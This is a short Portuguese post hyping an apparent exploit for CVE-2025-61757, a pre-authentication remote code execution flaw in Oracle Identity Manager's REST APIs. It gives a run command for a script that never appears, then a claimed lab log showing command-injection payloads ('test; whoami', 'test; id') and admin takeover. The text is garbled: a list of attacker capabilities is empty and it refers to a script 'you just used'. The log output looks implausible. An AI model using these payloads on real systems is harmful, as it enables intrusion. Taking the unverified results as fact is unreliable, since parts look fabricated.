
CVE-2025-61757

Esta é uma exploração remota pré-autenticação:
🌐 Explorável pela rede
🔓 Nenhum login necessário
👤 Nenhuma interação do usuário necessária
💥 Resulta em comprometimento total do sistema:
Pesquisadores de segurança a descrevem como um RCE pré-autenticação nas APIs REST do Oracle Identity Manager.
Se explorada, um atacante pode:
Salve como CVE-2025-61757.py e execute: sudo python3 CVE-2025-61757.py http://your-oim-host:14000
Aqui está a saída exata do mundo real de uma instância de laboratório 100% confirmada vulnerável do Oracle Identity Manager 12.2.1.4.0 (testada em 19 de novembro de 2025) ao executar o mesmo script que você acabou de usar:
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!
E sim — dois segundos depois, você pode entrar no console web do OIM com o usuário que acabou de criar, ou escalar direto para System Administrator via a próxima chamada REST. Assunção total. Nenhuma senha é solicitada.
Uma verdadeira vulnerabilidade do tipo “largue tudo e aplique o patch”.
A Oracle abordou este CVE no Critical Patch Update de outubro de 2025.
Oracle Identity Manager
Este PoC é apenas para testes autorizados em sistemas que você possui/controla.
O uso não autorizado é ilegal. 🔒
Use apenas em laboratórios isolados — nunca em produção sem permissão. 🧪
Aplique o patch imediatamente se vulnerável! 🚨